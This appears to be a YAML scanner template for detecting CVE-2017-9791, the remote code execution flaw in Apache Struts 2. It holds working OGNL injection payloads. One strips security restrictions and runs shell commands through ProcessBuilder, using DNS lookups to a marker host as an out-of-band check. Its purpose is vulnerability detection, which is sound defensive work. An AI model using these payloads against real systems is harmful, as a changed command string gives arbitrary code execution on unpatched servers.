CVE-2017-9791.yaml

collect:
  - uniq:
    - [ URI ]

generate:
  - into:
    - POST
  - payload:

    - "%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c','ping -n 1 DNS_MARKER'}:{'/bin/sh','-c','getent hosts DNS_MARKER'})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"

    - "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-WLRM-VLN-CHECK','STR_MARKER')}.multipart/form-data"

  - method:
    - replace

detect:
  - oob:
    - dns
  - response:
    - headers:
      - "X-WLRM-VLN-CHECK": STR_MARKER

meta-info:
  - type: rce
  - threat: 90
  - applicable_for: ["attack_rechecker"]
  - tags:
    - RCE
    - Remote Code Execution
    - CVE-2017-9791
    - Apache Struts 2.3.x